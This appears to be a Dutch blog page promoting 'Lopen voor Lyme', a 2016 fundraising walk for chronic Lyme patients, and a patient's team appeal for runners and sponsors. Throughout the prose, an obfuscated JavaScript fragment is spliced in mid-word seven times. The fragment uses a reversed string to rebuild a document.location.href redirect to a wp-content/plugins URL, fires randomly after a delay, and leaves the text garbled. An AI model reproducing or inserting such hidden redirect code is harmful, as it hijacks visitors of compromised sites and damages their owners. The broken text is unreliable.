Lopen voor Lyme

Lopen voor Lyme is een wandel en hardloop event voor Nederlandse chronische Lyme patiënten. De deelnemende teams proberen zoveel mogelijk funding op te halen voor de patiënten waar ze voor lopen.

Het evenement – Lopen voor Lyme

De eerste editie van Lopen voor Lyme vindt plaats op zaterdag 9 april 2016 op het Henschotermeer te Woudenberg.

Het doel

Creëren van Lyme awareness en het ophalen van funding voor het bekostigen van (buitenlandse) behandelingen, medicijnen, onderzoeken en dergelijke. Al het gedoneerde geld gaat direct naar de patiënten toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe, dus geen tussenkomst van stichtingen of andere partijen.

De start

Is om 7:00 uur ‘s ochtends en Lopen voor Lyme eindigt groots om 19:00 uur ’s avonds. Direct na de loop is er een speciaal moment voor chronisch Lyme patiënten. Uiteraard zijn gedurende de hele dag toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toeschouwers van harte welkom!

Tijdens en na de loop

Tijdens de loop zullen de lopers op micro niveau vergelijkbare symptoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomen als Lyme tegenkomen: fysieke vermoeidheid (niet meer kunnen), mentale vermoeidheid (niet meer willen), ondanks alles toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch voor jezelf blijven zorgen (eten, drinken) en proberen te blijven genieten (ondanks alles). Direct na de loop is er een speciaal moment voor chronisch Lyme patiënten.

Wilt u meer informatie over dit evenement, kijk dan op www.lopenvoorlyme.nl

Team Miles for Marleen

Voor mijn behandeling maak ik kosten die niet of maar deels worden vergoed. Daarnaast zijn er nog een aantal onderzoeken die ik zou willen doen, maar waar ik niet de financiële middelen voor heb, zoals het testen op andere co-infecties. Mocht ik naast Bartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonella ook nog besmet zijn geraakt met 1 of meerdere andere co-infecties, dan kan dit gevolgen hebben voor het verloop van de ziekte, maar ook op het effect van de behandeling. Op dit moment lijkt het onvermijdelijk dat ik in de schulden ga komen. Lopen voor Lyme is dan ook een unieke kans om te kunnen gaan vechten voor herstel, zonder de constante zorgen om mijn financiële situatie. En misschien maakt dit evenement het zelfs wel mogelijk om mijn behandeling voort te zetten bij een kliniek in Duitsland, waar ze gespecialiseerd zijn in de behandeling van de ziekte van Lyme. Dat zou wel echt fantastisch zijn! De uitgebreidere versie van mijn verhaal vind u op de pagina van team Miles for Marleen

Wil je me helpen?

Team Miles for Marleen is ingeschreven. Nu nog mijn team proberen aan te vullen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot 15 lopers en ik zoek natuurlijk mensen en/of bedrijven die de lopers zouden willen sponsoren.

Wilt u graag meelopen in team ‘Miles for Marleen’? Neem dan contact op via de pagina van team Miles for Marleen, het contactformulier of Facebook.

Mocht u 1 van de lopers van mijn team willen steunen? Daar ben ik ontzettend blij mee, bedankt!  Zo gaat het in zijn werk:

Via de pagina Miles for Marleen, kunt u de loper uitkiezen die u wilt steunen. Je kan dan het bedrag kiezen wat je wilt doneren. Vul hierna een geldig e-mailadres in. Je ontvangt vervolgens een e-mail met de betaalgegevens. Vervolgens boek je het geld- wat je hebt aangegeven te doneren- over.

Makkelijk toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch?

Benieuwd waarom de lopers zich willen inzetten voor dit evenement? Kijk dan op de pagina Teamleden Miles for Marleen.

Ik hoop dat dit evenement ontzettend gaat bijdragen aan Awareness EN dat een hoop Lyme patiënten zich dankzij dit evenement meer bezig kunnen gaan houden met wat echt belangrijk is: hun gezondheid!

 

Facebook reacties
%d bloggers liken dit: